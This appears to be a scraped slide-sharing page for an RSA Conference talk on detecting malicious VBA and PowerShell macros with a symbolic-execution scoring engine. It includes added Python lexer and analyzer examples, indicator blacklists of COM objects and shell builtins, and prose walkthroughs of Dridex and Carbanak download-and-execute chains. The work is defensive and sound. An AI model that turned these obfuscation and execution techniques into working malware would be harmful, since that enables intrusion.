#RSAC
SESSION ID: HTA-R11
Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats
Rotem Salinas, Senior Security Researcher, RSA Security, Rotem.Salinas@rsa.com, @rotemsalinas
Uri Fleyder-Kotler, Advanced Threats Research Lab Manager, RSA Security, Uri.Fleyder@rsa.com, @ufleyder
2. Houston We Have a Problem
Agentless/non-malware attacks are a rapidly growing threat
Attackers are implementing stealthier methods to bypass defenses
3. Research Goals
Goals
— Find a way to assess a script’s “maliciousness” automatically
— Do it without the potential harm of infection
— Make it fast!
Narrow the problem space
— VBA
— Powershell
— Not focused on the code extraction
— The same concepts can apply to similar problems
4. The “Imaginary Engine”
How can we develop such a 1337 imaginary engine?
Problem solving in 3 basic steps
— Analyze
— Brainstorming
— Implementation
5. The First Step – Malware Analyst Standpoint
Traditional Static Analysis Approach: Determine Execution Flow -> Deobfuscate -> Find Suspicious Activity
6. Perception Test – What Do Attackers Do?
7–8. The First Step – Understanding The Attacker’s Mindset
9. The First Step – The Attacker’s Main Objectives
Objectives | Indicators
Code execution | Prerequisite; spawning new processes/threads
Persistency | Disk operations, registry operations
Stealth | OS manipulation
Enumeration | Registry operations, enumeration
Command & Control / Data Exfiltration | Network operations
Lateral Movement | Network operations, enumeration
10. Case Study – Dridex Campaign
Peaked during 2015-2016
Used macros in Office documents to deploy Dridex variants
Targeted many companies and financial entities around the world
Delivered in large-scale spam/spear-phishing campaigns
11. Case Study – Dridex Campaign
12. Case Study 1 – Dridex Campaign
Entrypoint – This is where the code starts its execution
Non-Linear Code Execution – GoTo jumping to labels
13. Case Study 1 – Dridex Campaign
COM Object Creation
14. Case Study 1 – Dridex Campaign
URL De-Obfuscation + HTTP Request Creation
15. Case Study 1 – Dridex Campaign
Sending GET request
Initializing ADODB object to write file to disk
16. Case Study 1 – Dridex Campaign
Writing Response Body Data to disk
17. Case Study 1 – Dridex Campaign
Executing Downloaded File
18. Case Study – Anunak/Carbanak
Financial APT
Only 1 submission to VT
Attributed to the Anunak cybergang
Final payload
— VBS/Powershell
— PE Executable
See full analysis in Appendix
19. The Second Step – Brainstorming
Common approaches, pros and cons
Hooking
— Use available source code or patch existing dll/exe
— Inserting code that would sink certain expressions
— Remove potentially harmful code
Taint Analysis / Symbolic Execution
— Implement an engine that would emulate the language interpreter
— The engine should evaluate each line of code
— Instead of invoking potentially harmful expressions it would sink them
20. We Have a Winner!
Symbolic Execution
Pros
— Cannot harm the machine in any way (even if we missed something)
— We know exactly how it works. NO Reverse Engineering!
— Not limited to a specific platform/OS
Cons
— Hard to implement
— Might lack some language functionality
21. Symbolic Execution: Double Sweep Method
First sweep
— Global context: global variables, code
— Function declarations
— External DLL declarations
22. Symbolic Execution: Double Sweep Method
Second sweep
— Function code – starts with Entrypoint
— Follows execution flow
— Executes stubs instead of built-in language functions
— Evaluates expressions: math, string manipulation, logical expressions (condition evaluation)
23. Implementation Details
Python
PyParsing
Dave Beazley’s (Python guru) PLY – Python Lex-Yacc
— Lex – lexical analysis/tokenizer
— Yacc (Yet Another Compiler Compiler) – syntax analyzer
BNF – Backus-Naur Form
Where to start -> RTFM
24. Lexical Analyzer (Tokenizer)
Tokens
— Language keywords
— Immediate values: strings, integer/numeric values, floating point values, arrays/compound data types
— Identifiers – variable names, function names, object names
— Operators – math, bitwise, logical, string manipulation
* Diagram courtesy of David Beazley
25. Syntax Analyzer (Parser)
Parses the language syntax according to the tokenized output from the lexer
The language syntax/grammar is defined by multiple functions
Each function represents a BNF expression and passes the parsed/extracted values to the next function in line according to the BNF statement
* Diagram courtesy of David Beazley
26–33. PLY Lex Example
* Diagrams courtesy of David Beazley
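The lexer of slide 24, as an added example (not the deck's or David Beazley's code): a tokenizer for a VBA subset built the way a PLY lexer is, from an ordered list of named token regexes joined into one master pattern, but without the ply dependency. The token names, keyword set and operator list are assumptions.

```python
import re

# Keywords are matched as identifiers first and then reclassified (PLY's usual idiom).
KEYWORDS = {"sub", "function", "end", "dim", "set", "if", "then", "else", "declare",
            "lib", "alias", "as", "goto", "call", "private", "public", "exit"}

# Token rules in priority order; like PLY they are joined into one master regex whose
# alternation is tried left to right at each position, so order resolves ambiguity.
TOKEN_SPEC = [
    ("COMMENT", r"'[^\n]*"),                          # ' comment to end of line
    ("STRING",  r'"(?:[^"\n]|"")*"'),                 # "" inside a string is an escaped quote
    ("FLOAT",   r"\d+\.\d+"),                         # before INT, or "2.5" would lex as 2 . 5
    ("INT",     r"&H[0-9A-Fa-f]+|\d+"),               # decimal or &H hex (before OP's "&")
    ("OP",      r"<>|<=|>=|[-+*/\\^&=<>(),.:]"),      # math, string (&), comparison, punctuation
    ("IDENT",   r"[A-Za-z][A-Za-z0-9_]*"),
    ("NEWLINE", r"\n"),
    ("SKIP",    r"[ \t]*_[ \t]*(?:\r?\n|$)|[ \t\r]+"),  # line continuation " _" or blanks
    ("ERROR",   r"."),                                # anything else is a lexing error
]
MASTER = re.compile("|".join(f"(?P<{name}>{pat})" for name, pat in TOKEN_SPEC))


def tokenize(src):
    """Return (TYPE, value) pairs; literals are converted, keywords lower-cased."""
    tokens = []
    for m in MASTER.finditer(src):
        kind, text = m.lastgroup, m.group()
        if kind in ("SKIP", "COMMENT"):
            continue
        if kind == "IDENT" and text.lower() in KEYWORDS:
            kind, text = "KEYWORD", text.lower()      # VBA keywords are case-insensitive
        elif kind == "STRING":
            text = text[1:-1].replace('""', '"')
        elif kind == "INT":
            text = int(text[2:], 16) if text[:2].upper() == "&H" else int(text)
        elif kind == "FLOAT":
            text = float(text)
        elif kind == "ERROR":
            raise SyntaxError(f"illegal character {text!r} at offset {m.start()}")
        tokens.append((kind, text))
    return tokens
```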
34. Tokenizer Demo
35–39. PLY Yacc Example
* Diagrams courtesy of David Beazley
40. Engine Design Overview
Scoring
— Blacklist (score++)
— Whitelist (score--)
— A higher score -> more malicious
— If score >= threshold Then isMalicious = True
41. Obfuscation As Heuristics
Obfuscation can be a strong indicator for malicious behavior
Examples
— Object returned from function call
— Object created from function call return value string
42. Obfuscation As Heuristics – More Examples
— Self-modifying code (during runtime)
— Data read from controls embedded in the document is considered suspicious
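An added example, not the talk's engine, that puts slides 21, 22, 40 and 41 together as a minimal two-sweep symbolic executor for a VBA subset: the first sweep collects procedure bodies and global statements, the second runs from the entrypoint with stubs in place of CreateObject and the other builtins, string expressions are evaluated so a ProgID assembled from a function's return value still resolves, an If whose condition cannot be decided is explored anyway, and the recorded hits are scored against a blacklist/whitelist. The sample macro, the indicator weights and the threshold are constructed for the demo.

```python
import re

# Constructed VBA macro (not a real sample): the ProgID is built from a global plus a function's return value (slide 41).
SAMPLE_VBA = '''
g = "ft.XML"
Function Piece() As String
    Piece = "Microso" & g & "HTTP"
End Function
Sub AutoOpen()
    Set o = CreateObject(Piece())
    If g <> "" Then
        Set fs = CreateObject("Scripting.FileSystemObject")
    End If
    MsgBox "done"
End Sub
'''
ENTRYPOINTS = ("autoopen", "document_open", "workbook_open", "auto_open")
# Illustrative weights (not the talk's tuning) for indicators from the deck's VBA appendix.
BLACKLIST = {"microsoft.xmlhttp": 3, "winhttp.winhttprequest.5.1": 3, "wscript.shell": 3,
             "scripting.filesystemobject": 2, "adodb.stream": 2, "shell": 3, "kill": 2}
WHITELIST = {"msgbox": -1}                       # benign activity pulls the score down
THRESHOLD = 4


def split(expr, sep):
    # Split on sep outside double quotes (an even number of quotes must follow); parentheses are not tracked.
    return [p.strip() for p in re.split(re.escape(sep) + r'(?=(?:[^"]*"[^"]*")*[^"]*$)', expr)]


class Engine:
    def __init__(self, src):
        self.globals, self.funcs, self.hits = {}, {}, []
        self.first_sweep(src.splitlines())

    def first_sweep(self, lines):                # Sweep 1: procedure bodies + global statements
        cur, body, top = None, [], []
        for raw in lines:
            line = raw.strip()
            if (m := re.match(r"(?:Private |Public )?(?:Sub|Function) (\w+)\(", line, re.I)):
                cur, body = m.group(1).lower(), []
            elif re.match(r"End (Sub|Function)\b", line, re.I):
                self.funcs[cur], cur = body, None
            else:
                (body if cur else top).append(line)
        self.run(top, self.globals)              # global assignments run first

    def second_sweep(self):                      # Sweep 2: execute from the entrypoint
        entry = next(n for n in ENTRYPOINTS if n in self.funcs)  # StopIteration if none
        self.run(self.funcs[entry], dict(self.globals))

    def run(self, body, scope):
        i = 0
        while i < len(body):
            line = body[i]
            if (m := re.match(r"If (.+) Then$", line, re.I)):     # block If only, not nested
                j = body.index("End If", i)
                # Enter when the condition is true OR unknown ("when in doubt, brute-force").
                if self.eval_expr(m.group(1), scope) is not False:
                    self.run(body[i + 1:j], scope)
                i = j
            elif (m := re.match(r"(?:Set )?(\w+) = (.+)", line, re.I)):
                scope[m.group(1).lower()] = self.eval_expr(m.group(2), scope)
            elif line and not line.startswith("'") and not re.match(r"Dim\b", line, re.I):
                name, rest = re.match(r"(\w+)\s*(.*)", line).groups()   # call statement
                self.call(name, [self.eval_expr(a, scope) for a in split(rest, ",") if a])
            i += 1

    def eval_expr(self, expr, scope):            # concrete str/bool, or None while unknown
        expr = expr.strip()
        for op in ("<>", ">=", "<=", ">", "<", "="):
            if len(parts := split(expr, op)) == 2:
                a, b = (self.eval_expr(p, scope) for p in parts)
                if a is None or b is None or type(a) is not type(b): return None
                return {"<>": a != b, ">=": a >= b, "<=": a <= b, ">": a > b, "<": a < b, "=": a == b}[op]
        if len(parts := split(expr, "&")) > 1:   # string concatenation
            vals = [self.eval_expr(p, scope) for p in parts]
            return None if None in vals else "".join(map(str, vals))
        if expr.startswith('"'):
            return expr[1:-1].replace('""', '"')
        if (m := re.match(r"(\w+)\((.*)\)$", expr)):
            args = [self.eval_expr(a, scope) for a in split(m.group(2), ",") if a]
            return self.call(m.group(1), args)
        return scope.get(expr.lower())           # variable; None if never assigned

    def call(self, name, args):                  # run user functions, stub builtins
        key = name.lower()
        if key in self.funcs:                    # parameters are not modelled
            local = dict(self.globals)
            self.run(self.funcs[key], local)
            return local.get(key)                # VBA returns via FuncName = value
        self.hits.append((key, args))            # recorded, never actually invoked
        return f"<COM {args[0]}>" if key == "createobject" else None

    def score(self):                             # blacklist raises, whitelist lowers
        keys = [k for name, args in self.hits for k in [name] + [str(a).lower() for a in args]]
        return sum(BLACKLIST.get(k, 0) + WHITELIST.get(k, 0) for k in keys)


def analyze(src):
    eng = Engine(src)
    eng.second_sweep()
    return {"hits": eng.hits, "score": eng.score(), "malicious": eng.score() >= THRESHOLD}
```

The engine never instantiates a COM object or runs a command; `analyze(SAMPLE_VBA)` resolves the concatenated ProgID to Microsoft.XMLHTTP and reports the macro as malicious.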
43. Demo The Engine
44. The Age Old Question of FP vs. FN
False positives
False negatives
Decide what works best for you!
45. Lessons Learned
Challenges
— Condition evaluation
— Recursion limit
Lessons
— When in doubt, brute-force!
— Use the language specification guide as a guideline rather than implementing every language feature that exists
46. Apply
DIY 1: Develop It Yourself
DIY 2: Deploy In Your Organization
— Network
— Endpoint
— Use for your investigations
47. Q&A
Rotem Salinas – Rotem.Salinas@rsa.com, @rotemsalinas
Uri Fleyder-Kotler – Uri.Fleyder@rsa.com, @ufleyder
48. VBA Indicators of Suspicious Activity
File System Operations
— COM Objects: Scripting.FileSystemObject, ADODB.Stream
— Cmd – output redirect/copy/del/move
— Open builtin function
— Importing External DLLs – URLMON
Network Operations
— COM Objects: Microsoft.XMLHTTP, WinHttp.WinHttpRequest
OS Manipulation
— Importing External DLLs – KERNEL32
— WMI Objects
Registry
— Importing External DLLs – ADVAPI32
49. VBA Indicators of Suspicious Activity
Enumeration
— WMI Objects
— Cmd – net share/net use/ipconfig/environment variables
Obfuscation
— Self Modifying Code: Eval, CodeModule
— Obfuscation Beyond Reasonable Doubt
50. VBA Indicators of Suspicious Activity
COM Object Creation
WMI Objects Creation
Self Modifying Code: Eval, CodeModule
Built-In Functions
Importing External DLL
Obfuscation Beyond Reasonable Doubt
51. VBA – COM Object Creation – Network Activity
Rule of thumb – if your Office documents are communicating you are in serious trouble
Network Activity – COM Objects
— Microsoft.XMLHTTP
— MSXML2.SERVERXMLHTTP.6.0
— MSXML2.SERVERXMLHTTP
— MSXML2.XMLHTTP
— WinHttp.WinHttpRequest.5.1
— WinHttp.WinHttpRequest
— InternetExplorer.Application
52. VBA – COM Object Creation – Network Activity
— Microsoft.XMLHTTP
— WinHttp.WinHttpRequest.5.1
53. VBA – COM Object Creation – File System Activity
— Scripting.FileSystemObject
— ADODB.Stream
54. VBA – COM Object Creation – Command Execution
— WScript.Shell
— Shell.Application
55. VBA – COM Object Creation – Obfuscation
— XStandard.Base64
— MSXML2.DOMDocument.3.0
— MSXML2.DOMDocument
56. VBA – Built-In Functions
— CreateObject – Create COM object by String Object Name
— GetObject – Create WMI/COM object
— Eval – Covered In Self-Modifying
— ExecuteGlobal – VBS specific
— CallByName – Calls a Function/Method by string name
— Shell – Executes a Command
— Environ – Evaluates Environment Variables
— Kill – Deletes a File
— Application.Run – Calls a Function by String Name
57. VBA – WMI Object Creation
winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2
Examples
58. VBA – Self-Modifying Code – Code Module
CodeModule – allows modifications of the VBA code
59. VBA – Self-Modifying Code – Eval
Eval – evaluates an expression and executes its code
ExecuteGlobal
60. VBA – Open Built-In Function
Write to file with the Open built-in function
61. VBA – Importing External DLL
Win32 API
Examples
62–67. Appendix – Case Study 1 A – Dridex (the walkthrough of slides 12–17)
— Entrypoint – This is where the code starts its execution
— Non-Linear Code Execution – GoTo jumping to labels
— COM Object Creation
— URL De-Obfuscation + HTTP Request Creation
— Sending GET request
— Initializing ADODB object to write file to disk
— Writing Response Body Data to disk
— Executing Downloaded File
68–74. Appendix – Case Study 1 B – Dridex
— Defining Globals
— Entrypoint
— Create obfuscated COM object
— Create more obfuscated COM objects
— Deobfuscate URL and create GET request
— Send GET request
— Receive Response Body and write to File
— Save To Disk
— Execution
Appendix – Case Study 2 - Ananuk
75
Entrypoint
De-obfuscate
#RSAC
Appendix – Case Study 2 - Ananuk
76
Beacon and Deploy final Payload
De-Obfuscate
#RSAC
Appendix – Case Study 2 - Ananuk
77
Beacon Command & Control – Phase 1
Deobfuscate
#RSAC
Appendix – Case Study 2 - Ananuk
78
Beacon Command & Control – Phase 2
Deobfuscate
#RSAC
Appendix – Case Study 2 - Ananuk
79
Deploy Base64 Payload
Write Base64 Decoded Payload
to Temp Path
Execute Payload
#RSAC
Appendix – Case Study 2 - Ananuk
80
Analyzing Payload 1
Payload is an icon
Used for credibility
Attempts to gain persistency on the
Victim’s machine both by using known
Autorun registry paths and by creating
A scheduled task using the schtasks command
81. Appendix – Powershell Indicators of Suspicious Activity
.NET Objects
— .NET Reflection
— Add-Type
— New-Object
WinAPI32 DLL Loading
WMI Objects
— Invoke-WmiMethod
Command Execution
— Invoke-Command
COM Objects
— New-Object -Com
82. Appendix – Powershell Obfuscation
Obfuscation Methods
— Base64
— SecureString
— Custom Decoding Methods
Powershell Techniques - .NET Reflection
83
Example 1 – LoadWithPartialName
Example 2 - LoadName
#RSAC
Powershell Techniques - Add-Type .NET code injection
84
Creation of a new type/class using .NET code
Creating an instance of the class
and invoking it’s Start method
#RSAC
Powershell Techniques – New-Object
85
Creating an object instance
In this example System.Net.WebClient instance is created in order to
download a file
#RSAC
Powershell Techniques - Invoke-WmiMethod
86
Using WMI for enumeration and system maniupulation
In this case creating a key in the windows registry
#RSAC
Powershell Techniques - DLL loading
87
Resolving Native Win32 API functions
$module = “kernel32.dll”
API Function to
be resolved
#RSAC
Powershell Techniques - New-Object -com
88
Similarly to the COM objects in VBA
The same COM objects can be used in Powershell using this command
89. Powershell Techniques – Obfuscation
Obfuscation methods in Powershell
— Adding ticks (the backtick escapes special characters but is ignored before non-special characters) + lowercase/uppercase mixing
— String concatenation/manipulation
— Get-Command + wildcards + aliases
— Invoke-Expression
90. Powershell Techniques – Obfuscation – Base64
Base64 using .NET classes
CertUtil
— By executing the certutil tool as a command
— certutil -decode encodedInputFileName decodedOutputFileName
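An added example (not from the deck) of a defender-side normalizer for the tick, case, string-concatenation and alias tricks listed on slide 89: it strips backticks that are not real escapes, folds '...'+'...' pieces, lower-cases and expands a few aliases, then matches the result against indicators from slide 81. The sample fragment, the alias table and the indicator weights are assumptions; Get-Command/wildcard resolution is not handled.

```python
import re

# PowerShell's escape character is the backtick; before these letters it forms a real
# escape (`n newline, `t tab, ...) and anywhere else it is a no-op obfuscators sprinkle in.
ESCAPE_LETTERS = "0abefnrtv"
# A few real PowerShell aliases (assumed subset; a full table would come from Get-Alias).
ALIASES = {"iex": "invoke-expression", "saps": "start-process", "ni": "new-item"}
# Illustrative weights (not the talk's tuning) for indicators from the PowerShell appendix.
INDICATORS = {"invoke-expression": 3, "frombase64string": 2, "add-type": 2, "new-object": 1,
              "downloadstring": 3, "securestring": 1, "invoke-wmimethod": 2}

# Constructed obfuscated fragment for the demo (not a real sample).
SAMPLE_PS = "$m = ('Fro'+'mBase'+'64String'); iNv`O`Ke-eX`P`Re`SS`I`On ([Convert]::$m('SGk='))"


def normalize(script):
    """Undo tick insertion, case mixing, 'a'+'b' concatenation and common aliases."""
    out = re.sub(r"`([^" + ESCAPE_LETTERS + r"`])", r"\1", script)  # keep real escapes
    prev = None
    while prev != out:                         # fold 'Fro'+'mBase' -> 'FromBase' until stable
        prev = out
        out = re.sub(r"'([^']*)'\s*\+\s*'([^']*)'", r"'\1\2'", out)
    out = out.lower()                          # PowerShell is case-insensitive
    return re.sub(r"\b(" + "|".join(ALIASES) + r")\b", lambda m: ALIASES[m.group(1)], out)


def score(script):
    """Return the indicators found in the normalized script and their summed weight."""
    text = normalize(script)
    hits = {k: w for k, w in INDICATORS.items() if re.search(r"\b" + re.escape(k) + r"\b", text)}
    return hits, sum(hits.values())
```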
91. Case Study 3 – Targeted Spear Phishing Campaign
Javascript outer script with obfuscated strings
— Base64 encoded payloads
— Each string in the list is reversed
— A list of strings including commands and Base64-encoded payloads
92. Case Study 3 – Targeted Spear Phishing Campaign
Deploys 3 Powershell scripts on the victim’s machine
Payload 1 – .NET code injection using Add-Type
— Creation of a new type/class using .NET code
— Creating an instance of the class and invoking its Start method
93. Case Study 3 – Targeted Spear Phishing Campaign
Payload 2 – .NET code injection using Add-Type like the 1st payload
— Imports multiple Win32 API functions using .NET
94. Case Study 3 – Targeted Spear Phishing Campaign
Payload 3 – Downloads TOR Proxifier as a scheduled task
95. Case Study 4 – Powersploit + Invoke-Obfuscation
Open source project available on GitHub
PowerSploit includes capabilities such as:
— Shellcode injection
— Reflective DLL injection
— WMI
— Code execution
— Mimikatz – NTLM/LM password dump
Invoke-Obfuscation is a Powershell code obfuscation framework developed by Daniel Bohannon

More Related Content

PDF
Null Mumbai Meet_Android Reverse Engineering by Samrat Das
PPT
Steelcon 2015 Reverse-Engineering Obfuscated Android Applications
PPTX
Open arkcompiler
PDF
Null 14 may_lesser_known_attacks_by_ninadsarang
PPTX
Fuzzing | Null OWASP Mumbai | 2016 June
PDF
Wahckon[2] - iOS Runtime Hacking Crash Course
PDF
Rootcon X - Reverse Engineering Swift Applications
PDF
Improving DroidBox
Null Mumbai Meet_Android Reverse Engineering by Samrat Das
Steelcon 2015 Reverse-Engineering Obfuscated Android Applications
Open arkcompiler
Null 14 may_lesser_known_attacks_by_ninadsarang
Fuzzing | Null OWASP Mumbai | 2016 June
Wahckon[2] - iOS Runtime Hacking Crash Course
Rootcon X - Reverse Engineering Swift Applications
Improving DroidBox

What's hot (20)

PPTX
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013
PPTX
Reverse engineering android apps
PDF
Windows 10 - Endpoint Security Improvements and the Implant Since Windows 2000
PDF
Secure Coding in Perl
PDF
Enforcing API Design Rules for High Quality Code Generation
PPTX
Static code analysis
PDF
Securing a Raspberry Pi and other DIY IoT devices
PDF
.NET MALWARE THREAT: INTERNALS AND REVERSING DEF CON USA 2019
PDF
DEF CON 27 - DIMITRY SNEZHKOV - zombie ant farm practical tips
PPTX
Actor Concurrency Bugs: A Comprehensive Study on Symptoms, Root Causes, API U...
PPTX
The Veil-Framework
PDF
Introduction to Dynamic Analysis of Android Application
PPTX
[Defcon Russia #29] Алексей Тюрин - Spring autobinding
PDF
Higher Level Malware
PDF
A Modest Introduction To Swift
PDF
Technical Workshop - Win32/Georbot Analysis
PDF
Compiler for Zero-Knowledge Proof-of-Knowledge Protocols
PDF
Pinpointing Vulnerabilities (Ravel)
PDF
[HUN][Hackersuli] Androidos alkalmazássebészet, avagy gumikesztyűt fel és irá...
PPTX
2. introduction to compiler
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013
Reverse engineering android apps
Windows 10 - Endpoint Security Improvements and the Implant Since Windows 2000
Secure Coding in Perl
Enforcing API Design Rules for High Quality Code Generation
Static code analysis
Securing a Raspberry Pi and other DIY IoT devices
.NET MALWARE THREAT: INTERNALS AND REVERSING DEF CON USA 2019
DEF CON 27 - DIMITRY SNEZHKOV - zombie ant farm practical tips
Actor Concurrency Bugs: A Comprehensive Study on Symptoms, Root Causes, API U...
The Veil-Framework
Introduction to Dynamic Analysis of Android Application
[Defcon Russia #29] Алексей Тюрин - Spring autobinding
Higher Level Malware
A Modest Introduction To Swift
Technical Workshop - Win32/Georbot Analysis
Compiler for Zero-Knowledge Proof-of-Knowledge Protocols
Pinpointing Vulnerabilities (Ravel)
[HUN][Hackersuli] Androidos alkalmazássebészet, avagy gumikesztyűt fel és irá...
2. introduction to compiler
Ad

Similar to Isolating the Ghost in the Machine: Unveiling Post Exploitation Threatsrsac (20)

PPTX
DevOOPS: Attacks and Defenses for DevOps Toolchains
PDF
Autonomous Hacking: The New Frontiers of Attack and Defense
PDF
Applied machine learning defeating modern malicious documents
PDF
EMBA Firmware analysis - TROOPERS22
PDF
Keeping Up with the Adversary: Creating a Threat-Based Cyber Team
PDF
FIM and System Call Auditing at Scale in a Large Container Deployment
PDF
Corpsec: “What Happened to Corpses A and B?”
PPTX
The Hacking Games - Operation System Vulnerabilities Meetup 29112022
PDF
RSA APJ Velociraptor Lab
PDF
Open source-in-security-critical-environments
PDF
Open Source in Security-Critical Environments
PDF
The Emergent Cloud Security Toolchain for CI/CD
PDF
OSX Pirrit : Why you should care about malicious mac adware
PDF
Serverless Security: Are you ready for the Future?
PDF
Red team-view-gaps-in-the-serverless-application-attack-surface
PDF
Android Serialization Vulnerabilities Revisited
PDF
The Pivot
PDF
I got 99 trends and a # is all of them
PDF
Stop Passing the Bug: IoT Supply Chain Security
PDF
Attacks on Critical Infrastructure: Insights from the “Big Board”
DevOOPS: Attacks and Defenses for DevOps Toolchains
Autonomous Hacking: The New Frontiers of Attack and Defense
Applied machine learning defeating modern malicious documents
EMBA Firmware analysis - TROOPERS22
Keeping Up with the Adversary: Creating a Threat-Based Cyber Team
FIM and System Call Auditing at Scale in a Large Container Deployment
Corpsec: “What Happened to Corpses A and B?”
The Hacking Games - Operation System Vulnerabilities Meetup 29112022
RSA APJ Velociraptor Lab
Open source-in-security-critical-environments
Open Source in Security-Critical Environments
The Emergent Cloud Security Toolchain for CI/CD
OSX Pirrit : Why you should care about malicious mac adware
Serverless Security: Are you ready for the Future?
Red team-view-gaps-in-the-serverless-application-attack-surface
Android Serialization Vulnerabilities Revisited
The Pivot
I got 99 trends and a # is all of them
Stop Passing the Bug: IoT Supply Chain Security
Attacks on Critical Infrastructure: Insights from the “Big Board”
Ad

More from Priyanka Aash (20)

PPTX
AI Code Generation Risks (Ramkumar Dilli, CIO, Myridius)
PDF
From Chatbot to Destroyer of Endpoints - Can ChatGPT Automate EDR Bypasses (1...
PDF
Cracking the Code - Unveiling Synergies Between Open Source Security and AI.pdf
PDF
Oh, the Possibilities - Balancing Innovation and Risk with Generative AI.pdf
PDF
Lessons Learned from Developing Secure AI Workflows.pdf
PDF
Cyber Defense Matrix Workshop - RSA Conference
PDF
A Constitutional Quagmire - Ethical Minefields of AI, Cyber, and Privacy.pdf
PDF
Securing AI - There Is No Try, Only Do!.pdf
PDF
GenAI Opportunities and Challenges - Where 370 Enterprises Are Focusing Now.pdf
PDF
Coordinated Disclosure for ML - What's Different and What's the Same.pdf
PDF
10 Key Challenges for AI within the EU Data Protection Framework.pdf
PDF
Techniques for Automatic Device Identification and Network Assignment.pdf
PDF
Keynote : Presentation on SASE Technology
PDF
Keynote : AI & Future Of Offensive Security
PDF
Redefining Cybersecurity with AI Capabilities
PDF
Demystifying Neural Networks And Building Cybersecurity Applications
PDF
Finetuning GenAI For Hacking and Defending
PDF
(CISOPlatform Summit & SACON 2024) Kids Cyber Security .pdf
PDF
(CISOPlatform Summit & SACON 2024) Regulation & Response In Banks.pdf
PDF
(CISOPlatform Summit & SACON 2024) Cyber Insurance & Risk Quantification.pdf
AI Code Generation Risks (Ramkumar Dilli, CIO, Myridius)
From Chatbot to Destroyer of Endpoints - Can ChatGPT Automate EDR Bypasses (1...
Cracking the Code - Unveiling Synergies Between Open Source Security and AI.pdf
Oh, the Possibilities - Balancing Innovation and Risk with Generative AI.pdf
Lessons Learned from Developing Secure AI Workflows.pdf
Cyber Defense Matrix Workshop - RSA Conference
A Constitutional Quagmire - Ethical Minefields of AI, Cyber, and Privacy.pdf
Securing AI - There Is No Try, Only Do!.pdf
GenAI Opportunities and Challenges - Where 370 Enterprises Are Focusing Now.pdf
Coordinated Disclosure for ML - What's Different and What's the Same.pdf
10 Key Challenges for AI within the EU Data Protection Framework.pdf
Techniques for Automatic Device Identification and Network Assignment.pdf
Keynote : Presentation on SASE Technology
Keynote : AI & Future Of Offensive Security
Redefining Cybersecurity with AI Capabilities
Demystifying Neural Networks And Building Cybersecurity Applications
Finetuning GenAI For Hacking and Defending
(CISOPlatform Summit & SACON 2024) Kids Cyber Security .pdf
(CISOPlatform Summit & SACON 2024) Regulation & Response In Banks.pdf
(CISOPlatform Summit & SACON 2024) Cyber Insurance & Risk Quantification.pdf

Recently uploaded (20)

PPT
Teaching material agriculture food technology
PDF
NewMind AI Weekly Chronicles - August'25 Week I
PDF
Electronic commerce courselecture one. Pdf
PDF
Chapter 3 Spatial Domain Image Processing.pdf
PDF
Per capita expenditure prediction using model stacking based on satellite ima...
PPT
“AI and Expert System Decision Support & Business Intelligence Systems”
PDF
Machine learning based COVID-19 study performance prediction
PDF
7 ChatGPT Prompts to Help You Define Your Ideal Customer Profile.pdf
PDF
Optimiser vos workloads AI/ML sur Amazon EC2 et AWS Graviton
PDF
Dropbox Q2 2025 Financial Results & Investor Presentation
PDF
Review of recent advances in non-invasive hemoglobin estimation
PDF
Peak of Data & AI Encore- AI for Metadata and Smarter Workflows
PDF
Profit Center Accounting in SAP S/4HANA, S4F28 Col11
PDF
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
PDF
Unlocking AI with Model Context Protocol (MCP)
PPTX
Effective Security Operations Center (SOC) A Modern, Strategic, and Threat-In...
PPTX
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
PDF
cuic standard and advanced reporting.pdf
PDF
Advanced methodologies resolving dimensionality complications for autism neur...
PDF
The Rise and Fall of 3GPP – Time for a Sabbatical?
Teaching material agriculture food technology
NewMind AI Weekly Chronicles - August'25 Week I
Electronic commerce courselecture one. Pdf
Chapter 3 Spatial Domain Image Processing.pdf
Per capita expenditure prediction using model stacking based on satellite ima...
“AI and Expert System Decision Support & Business Intelligence Systems”
Machine learning based COVID-19 study performance prediction
7 ChatGPT Prompts to Help You Define Your Ideal Customer Profile.pdf
Optimiser vos workloads AI/ML sur Amazon EC2 et AWS Graviton
Dropbox Q2 2025 Financial Results & Investor Presentation
Review of recent advances in non-invasive hemoglobin estimation
Peak of Data & AI Encore- AI for Metadata and Smarter Workflows
Profit Center Accounting in SAP S/4HANA, S4F28 Col11
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
Unlocking AI with Model Context Protocol (MCP)
Effective Security Operations Center (SOC) A Modern, Strategic, and Threat-In...
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
cuic standard and advanced reporting.pdf
Advanced methodologies resolving dimensionality complications for autism neur...
The Rise and Fall of 3GPP – Time for a Sabbatical?

Isolating the Ghost in the Machine: Unveiling Post Exploitation Threatsrsac

  • 1. SESSION ID:SESSION ID: #RSAC Rotem Salinas Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats HTA-R11 Senior Security Researcher RSA Security Rotem.Salinas@rsa.com @rotemsalinas Uri Fleyder-Kotler Advanced Threats Research Lab Manager RSA Security Uri.Fleyder@rsa.com @ufleyder
  • 2. #RSAC Houston We Have a Problem 2 Agentless/non malware attacks is a rapidly growing threat Attackers are implementing stealthier methods to bypass defenses
  • 3. #RSAC Research Goals 3 Goals Find a way to assess a script’s “maliciousness” automatically Do it without the potential harm of infection Make it fast! Narrow the problem space VBA Powershell Not focused on the code extraction The same concepts can apply to similar problems
  • 4. #RSAC The “Imaginary Engine” 4 How can we develop such 1337 imaginary engine Problem solving in 3 basic steps Analyze Brainstorming Implementation
  • 5. #RSAC The First Step – Malware Analyst Standpoint 5 Determine Execution Flow Deobfuscate Find Suspicious Activity Traditional Static Analysis Approach
  • 6. #RSAC Perception Test – What Attackers Do? 6
  • 7. #RSAC The First Step – Understanding The Attacker’s Mindset 7
  • 8. #RSAC The First Step – Understanding The Attacker’s Mindset 8
  • 9. #RSAC The First Step – The Attacker’s Main Objectives 9 Objectives Indicators Code execution Prerequisite, Spawning New Processes/Threads Persistency Disk operations, Registry operations Stealth OS manipulation Enumeration Registry operations, Enumeration Command & Control / Data Exfiltration Network operations Lateral Movement Network operations, Enumeration
  • 10. #RSAC Case Study – Dridex Campaign 10 Peaked during 2015-2016 Used Macro in Office Documents to deploy Dridex variants Targeted many companies and financial entities around the world Delivered in a large scale Spam/Spear-Phishing campaigns
  • 11. #RSAC Case Study – Dridex Campaign 11
